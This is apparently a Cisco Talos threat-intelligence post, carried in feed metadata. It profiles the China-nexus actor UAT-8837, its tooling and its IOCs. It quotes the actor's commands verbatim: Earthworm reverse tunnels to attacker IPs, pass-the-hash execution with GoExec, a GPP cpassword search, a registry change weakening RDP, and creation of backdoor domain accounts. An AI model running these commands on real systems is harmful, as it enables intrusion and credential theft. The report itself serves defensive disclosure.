{“lastseen”:”2026-01-15T12:05:12″,”description”:”* Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on overlaps in tactics, techniques, and procedures (TTPs) with those of other known China-nexus threat actors.\\n * Based on UAT-8837’s TTPs and post-compromise activity Talos has observed across multiple intrusions, we assess with medium confidence that this actor is primarily tasked with obtaining initial access to high-value organizations.\\n * Although UAT-8837’s targeting may appear sporadic, since at least 2025, the group has clearly focused on targets within critical Infrastructure sectors in North America.\\n\\n\\n\\nAfter obtaining initial access — either by successful exploitation of vulnerable servers or by using compromised credentials — UAT-8837 predominantly deploys open-source tools to harvest sensitive information such as credentials, security configurations, and domain and Active Directory (AD) information to create multiple channels of access to their victims. The threat actor uses a combination of tools in their post-compromise hands-on-keyboard operations, including Earthworm, Sharphound, DWAgent, and Certipy. The TTPs, tooling, and remote infrastructure associated with UAT-8837 were also seen in the recent exploitation of CVE-2025-53690, a ViewState Deserialization zero-day vulnerability in SiteCore products, indicating that UAT-8837 may have access to zero-day exploits.\\n\\n* * *\\n\\n## Post-compromise actions\\n\\nUAT-8837 can exploit both n-day and zero-day vulnerabilities to gain access to target environments. Most recently, UAT-8837 exploited a ViewState Deserialization zero-day vulnerability in SiteCore products, CVE-2025-53690, to obtain initial access.\\n\\nAfter UAT-8837 gains initial access, they begin conducting preliminary reconnaissance, leveraging the following commands:\\n \\n \\n ping google[.]com\\n tasklist \/svc\\n netstat -aon -p TCP\\n whoami\\n quser\\n hostname\\n net user\\n \\n\\nThe threat actor disables RestrictedAdmin for Remote Desktop Protocol (RDP) to obtain credentials for remoting into other devices:\\n \\n \\n REG ADD HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa \/v DisableRestrictedAdmin \/t REG_DWORD \/d 00000000 \/f\\n \\n\\nA shell console may subsequently be opened via \\”cmd.exe\\” to conduct hands-on keyboard activity on the compromised endpoint. Multiple artifacts are then downloaded to the following directories which were extensively used for staging artifacts:\\n \\n \\n C:\\\\Users\\\\\\u003cuser\\u003e\\\\Desktop\\\\\\n C:\\\\windows\\\\temp\\\\\\n C:\\\\windows\\\\public\\\\music\\n \\n\\n## UAT-8837 tool usage\\n\\nUAT-8837 may use a variety of tooling throughout the course of an intrusion. This variation in tooling may be because many of these tools are detected and blocked by most security products such as Cisco Secure Endpoint (CSE) which often leads the threat actor to cycle through different variants of the tools to find versions that are not detected.\\n\\n### GoTokenTheft\\n\\nThe GoTokenTheft utility is a tool for stealing access tokens. Written in GoLang and deployed at C:\\\\Users\\\\\\u003cuser\\u003e\\\\Desktop\\\\go.exe, it may be used to steal tokens to run commands with elevated privileges:\\n \\n \\n eee.ico REG ADD HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa \/v DisableRestrictedAdmin \/t REG_DWORD \/d 00000000 \/f\\n \\n\\n### Earthworm\\n\\nEarthworm is network tunneling tool that has extensively been used by Chinese-speaking threat actors in intrusions to expose internal endpoints to attacker-owned remote infrastructure. UAT-8837 deploys multiple versions of Earthworm to determine which are not detectable by endpoint protection products. The undetected version is then used to create a reverse tunnel to attacker-controlled servers, as seen in the commands below:\\n \\n \\n C:\\\\Windows\\\\Temp\\\\v.ico -s rssocks -d 172[.]188[.]162[.]183 -e 1433\\n \\n C:\\\\users\\\\public\\\\videos\\\\verr.ico -s rssocks -d 172.188.162.183 -e 443\\n \\n C:\\\\Windows\\\\Temp\\\\eir.ico\u00a0 -p 8888 -t 172[.]188[.]162[.]183 -f 11112\\n \\n cisos.ico -s rssocks -d 172[.]188[.]162[.]183 -e80\\n \\n vgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 443\\n \\n vgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 447\\n \\n abc.ico -s rssocks -d 4[.]144[.]1[.]47 -e 448\\n \\n C:\\\\users\\\\public\\\\music\\\\aa.exe -s rssocks -d 74[.]176[.]166[.]174 -e 443\\n \\n C:\\\\Users\\\\public\\\\Music\\\\twd.exe -s rssocks -d 20[.]200[.]129[.]75 -e 443\\n \\n \\n\\n### DWAgent\\n\\nUAT-8837 deploys DWAgent, a remote administration tool, to make it easier to access the compromised endpoint and drop additional malware to the system:\\n \\n \\n C:\\\\Users\\\\\\\\Downloads\\\\dwagent.exe\\n \u00a0\\n C:\\\\Users\\\\\\\\AppData\\\\Local\\\\Temp\\\\dwagent20250909101732\\\\runtime\\\\dwagent.exe -S -m installer\\n \\n\\n### SharpHound\\n\\nPer Talos’ observations, UAT-8837 downloads SharpHound with the intention to collect Active Directory information:\\n \\n \\n C:\\\\Windows\\\\Temp\\\\SharpHound.exe\\n \\n\\n### Impacket\\n\\nUAT-8837 makes several attempts to download Impacket-based binaries to use in their operations:\\n \\n \\n C:\\\\Windows\\\\Temp\\\\wec.ico\\n \\n\\nWhen Impacket is detected and blocked, Invoke-WMIExec is downloaded to run commands with elevated privileges:\\n \\n \\n C:\\\\Windows\\\\Temp\\\\Invoke-WMIExec.ps1\\n \\n\\n### GoExec\\n\\nIn one intrusion, after cycling through a number of tools, UAT-8837 deployed GoExec, a GoLang-based remote execution tool to execute commands on other connected remote endpoints within the victim’s network:\\n \\n \\n goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cu\\u003e\/\\u003cp\\u003e -H \\u003chash\\u003e -e ‘cmd.exe’ -a ‘\/C hostname \/all’ -o-\\n \u00a0\\n C:\\\\Windows\\\\Temp\\\\goe.exe wmi proc 10[.]xx[.]xx[.]xx \\\\\\n \u00a0\\n goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cu\\u003e\/\\u003cp\\u003e –nt-hash \\u003chash\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n \u00a0\\n goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e –nt-hash \\u003chash\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n \u00a0\\n goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e –nt-hash 00000000000000000000000000000000:\\u003chash\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n \u00a0\\n goe.ico dcom mmc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e –nt-hash 00000000000000000000000000000000:\\u003chash\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n \u00a0\\n goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e -p \\u003cpassword\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n \u00a0\\n g.ico dcom mmc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e -p \\u003cpassword\\u003e -e cmd.exe -a \/C ipconfig -o-\\n g.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e -p \\u003cpassword\\u003e -e cmd.exe -a \/C hostname -o-\\n \\n\\nIt is worth noting here that the usage of GoExec was likely an on-the-fly decision by the operator, necessitated by the constant detection and blocking of the threat actors tooling by CSE.\\n\\nThe threat actor also attempted to download and execute SharpWMI in the compromised environment, which was again detected by CSE:\\n \\n \\n C:\\\\Windows\\\\Temp\\\\s.ico\\n \\n\\n### Rubeus\\n\\nRubeus, a C# based toolset for Kerberos abuse may also be deployed:\\n\\n * C:\\\\Windows\\\\Temp\\\\r.ico\\n * C:\\\\Windows\\\\Temp\\\\lo.txt\\n\\n\\n\\n### Certipy\\n\\nUAT-8837 also deploys Certipy, a tool for AD discovery and abuse, to:\\n \\n \\n C:\\\\Windows\\\\Temp\\\\Certipy.exe\\n\\n## Hands-on-keyboard activity\\n\\nUAT-8837 may run a series of commands during the intrusion to obtain sensitive information, such as credentials from victim organizations:\\n \\n \\n findstr \/S \/l cpassword [\\\\\\\\]\\\\policies\\\\*.xml\\n \\n\\nThe system’s security configuration is also exported using secedit:\\n \\n \\n secedit \/export \/cfg C:\\\\windows\\\\temp\\\\pol.txt\\n \\n\\nWindows Local security policies extracted via secedit include password policies, user rights and audit settings. This information may be valuable to adversaries who seek to evaluate an endpoint’s security posture including network security settings.\\n\\nIn one victim organization, UAT-8837 exfiltrated DLL-based shared libraries related to the victim’s products, raising the possibility that these libraries may be trojanized in the future. This creates opportunities for supply chain compromises and reverse engineering to find vulnerabilities in those products.\\n\\n### Domain reconnaissance\\n\\nThe net commands typically used to query domain groups and users are:\\n \\n \\n net group domain admins \/domain\\n \\n net localgroup administrators \/domain\\n \\n net group \\u003cname\\u003e \/domain\\n \u00a0\\n net user \\u003cuser\\u003e \\u003cpassword\\u003e \/domain\\n \\n net user \\u003cuser\\u003e \/domain\\n \\n net accounts \/domain\\n \\n net user \\u003cuser\\u003e \/domain\\n \u00a0\\n nltest \/DCLIST:\\u003cdomain\\u003e\\n \\n nslookup \\u003csubdomina\\u003e.\\u003cdomain\\u003e\\n \\n \\n\\nThe `setspn` command is used to list and query Service Principal Names (SPN) data from Active Directory:\\n \\n \\n setspn -L \\n \\n setspn -Q *\/*\\n \\n\\n### Active Directory reconnaissance\\n\\nUAT-8837 deploys a combination of tools to perform AD reconnaissance in the compromised environment. These tools include SharpHound and Certipy. The threat actor also uses the Windows-native tool \\”setspn\\” to query for AD data. However, UAT-8837 also brings their own living-off-the-land (LOTL) tooling. In one intrusion, the actor deployed dsget and dsquery to query for specific properties in the AD:\\n \\n \\n dsquery.exe user -limit 0 \\n \\n dsquery.exe user -name \\u003cname\\u003e\\n \\n dsget user -samid -display -email -upn\\n \\n dsget.exe user -samid -display -email -upn\\n \\n dsquery.exe user -samid \\u003cid\\u003e \\n \\n dsget.exe user -display -email -upn\\n \\n dsquery.exe user -name admin\\n \\n dsget.exe user CN=\\u003cid\\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\\u003cdomain\\u003e,DC=com -samid -display -email -upn\\n \\n dsget.exe user CN=\\u003cid\\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\\u003cdomain\\u003e,DC=com -upn\\n \\n dsget.exe user CN=\\u003cid\\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\\u003cdomain\\u003e,DC=com -memberof\\n \\n dsget.exe user CN=\\u003cid\\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\\u003cdomain\\u003e,DC=com -disabled\\n \\n dsquery * DC=prod,DC=\\u003cdomain\\u003e,DC=com -filter (objectClass=user) -attr * -limit 0\\n \\n \\n\\n### Backdoored user accounts\\n\\nThe threat actor created user accounts to open up another channel of access to the compromised environment:\\n \\n \\n net user \\u003cuser\\u003e \\u003cpassword\\u003e \/add \/domain\\n \\n\\nIn another instance, UAT-8837 added an existing user account to local groups:\\n \\n \\n net user \\u003cuser\\u003e\\n \\n net localgroup \\u003cgroup\\u003e \\u003cuser\\u003e \/add\\n \\n\\n## Coverage\\n\\nThe following ClamAV signature detects and blocks this threat:\\n\\n * Win.Malware.Earthworm\\n\\n\\n\\nThe following Snort Rules (SIDs) detect and block this threat:\\n\\n * Snort 2 – 61883, 61884, 63727, 63728\\n * Snort 3 – 300585, 63727, 63728\\n\\n\\n\\n## Indicators of compromise (IOCs)\\n\\nThe IOCs for this threat are also available at our GitHub repository here.\\n \\n \\n 1b3856e5d8c6a4cec1c09a68e0f87a5319c1bd4c8726586fd3ea1b3434e22dfa – GoTokenTheft\\n 451e03c6a783f90ec72e6eab744ebd11f2bdc66550d9a6e72c0ac48439d774cd – Earthworm\\n B3f83721f24f7ee5eb19f24747b7668ff96da7dfd9be947e6e24a688ecc0a52b – Earthworm\\n Fab292c72ad41bae2f02ae5700c5a88b40a77f0a3d9cbdf639f52bc4f92bb0a6 – Earthworm\\n 4f7518b2ee11162703245af6be38f5db50f92e65c303845ef13b12c0f1fc2883 – Earthworm\\n \u00a0\\n 891246a7f6f7ba345f419404894323045e5725a2252c000d45603d6ddf697795 – GoTokenTheft\\n 5090f311b37309767fb41fa9839d2770ab382326f38bab8c976b83ec727e6796 – SharpHound\\n 6e8af5c507b605a16373e8453782bfd8a3ec3bd76f891e71a159d8c2ff2a5bb0 – Impacket\\n 887817fbaf137955897d62302c5d6a46d6b36cb34775e4693e30e32609fb6744 – GoExec\\n 4af156b3285b49485ef445393c26ca1bb5bfe7cdc59962c5c5725e3f3c574f7c – GoExec\\n 1de72bb4f116e969faff90c1e915e70620b900e3117788119cffc644956a9183 – SharpWMI\\n 51d6448e886521aaaaf929a50763156ceb99ede587c65de971700a5583d6a487 – Rubeus\\n 2f295f0cedc37b0e1ea22de9d8cb461fa6f84ab0673fde995fd0468a485ddb59 – Rubeus\\n E27e6e8e97421593f1e8d66f280e894525e22b373248709beaf81dc6107fb88d – Certipy\\n \u00a0\\n B7ecd4ff75c0e3ed196e1f53d92274b1e94f17fa6c39616ce0435503906e66fb\\n 42e3ad56799fbc8223fb8400f07313559299496bb80582a6cbae29cb376d96c3\\n 6d20371b88891a1db842d23085a0253e36cf3bf0691aee2ae15a66fc79f3803d\\n 4e8304040055d3bffcb3551873da45f66577723d1a975416a49afa5aec4eb295\\n BDF7B28DF19B6B634C05882D9F1DB73F63252F855120ED3E4DA4E26F2C6190E8\\n 1c5174672bf2ccedb6a426336ca79fd326e61cd26dd9ae684b8ffd0b5a70c700\\n d0beb6184ea4402c39e257d5912c7ace3607e908e76127014e3ec02866b6d70c\\n 194ca1b09902ceaaa8a7e66234be9dc8a12572832836361f49f1074eae861794\\n 74e68b4e07d72c9b8e0bc8cbfd57f980b4a2cd9d27c37bb097ca4fb2108706e3\\n Ced14e8beb20a345a0d6f90041d8517c04dbc113feff3bc6e933968d6b846e31\\n 8bf233f608ea508cd6bf51fb23053d97aa970b8d11269d60ce5c6e113e8e787a\\n 5391f69425217fa8394ebac0d952c5a3d1f0f5ac4f20587978cd894fdb6199cd\\n 8bc008a621c5e3068129916770d24ee1d7d48079ee42797f86d3530ca90e305c\\n De9c13b1abeab11626a8edc1385df358d549a65e8cc7a69baca84cd825acc8e7\\n 4d47445328bfd4db12227af9b57daab4228244d1325cba572588de237f7b2e98\\n \u00a0\\n 74[.]176[.]166[.]174\\n 20[.]200[.]129[.]75\\n 172[.]188[.]162[.]183\\n 4[.]144[.]1[.]47\\n 103[.]235[.]46[.]102″,”published”:”2026-01-15T11:00:47″,”modified”:”2026-01-15T11:00:47″,”type”:”talosblog”,”title”:”UAT-8837 targets critical infrastructure sectors in North America”,”source”:””,”references”:””,”id”:”TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384″,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[“CVE-2025-53690″],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:H\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/blog.talosintelligence.com\/uat-8837\/”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-15T12:05:12″,”description”:”* Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[9,6,8,86,12,13,7,69,11,5],"class_list":["post-35787","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-critical","tag-cve","tag-cvss","tag-cvss-90","tag-exploit","tag-news","tag-security","tag-talosblog","tag-tapic","tag-vulnerability"],"yoast_head":"\n